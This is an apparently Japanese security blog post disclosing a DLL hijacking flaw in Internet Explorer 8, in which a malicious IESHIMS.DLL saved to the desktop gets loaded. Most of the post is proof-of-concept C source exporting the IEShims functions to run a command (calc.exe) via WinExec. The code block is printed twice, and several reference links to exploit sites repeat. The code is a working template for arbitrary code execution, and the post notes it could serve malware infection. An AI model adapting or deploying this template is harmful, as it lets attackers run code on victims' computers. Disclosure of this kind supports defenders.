9月1日からIE8の「IESHIMS.DLL」のDLLハイジャックのソースコードをインターネットで交換されております。その後に色んなサイトでエックスプロイトのコードが交換されます。本件のセキュリティ問題は実は危険な状況ですが、例え、もしユーザがInternet explorer 8を使うと、それとIE8のダウンロードファイル保存場所はデスクトップですと本問題に影響されます。詰り下記のコードを使い、悪戯IESHIMS.DLLファイルを作るとデスクトップに保存したら問題の再現が出来ます、完全にパソコンにあるコマンドを実行する事が出来ます(下記のサンプルではcalc.exeを実行されます)
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void IEShims_GetOriginatingThreadId() { MantyCore(); }
DLLIMPORT void IEShims_InDllMainContext() { MantyCore(); }
DLLIMPORT void IEShims_Initialize() { MantyCore(); }
DLLIMPORT void IEShims_SetRedirectRegistryForThread() { MantyCore(); }
DLLIMPORT void IEShims_Uninitialize() { MantyCore(); }
int MantyCore()
{
WinExec("calc", 0);
exit(0);
return 0;
}
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void IEShims_GetOriginatingThreadId() { MantyCore(); }
DLLIMPORT void IEShims_InDllMainContext() { MantyCore(); }
DLLIMPORT void IEShims_Initialize() { MantyCore(); }
DLLIMPORT void IEShims_SetRedirectRegistryForThread() { MantyCore(); }
DLLIMPORT void IEShims_Uninitialize() { MantyCore(); }
int MantyCore()
{
WinExec("calc", 0);
exit(0);
return 0;
}
実は似たようなIE7のバグもありました、このサイトに確認が出来ます。なんだかMicrosost社のレスポンスが無くてIE8には残っています。ぜひ、今回のIESHIMS.DLLの対応して欲しいですね。本件セキュリティ問題情報がマルウェアが使われたらマルウェアの感染仕組みが作れます。
本問題に対する技術リファレンスは下記のURLとなります。
http://www.exploit-db.com/exploits/2929/
http://inj3ct0r.com/exploits/13898
http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx
http://inj3ct0r.com/exploits/13898
http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx
---
http://0day.jp
ゼロデイ・リサーチチーム
アドリアン・ヘンドリック
0 件のコメント:
コメントを投稿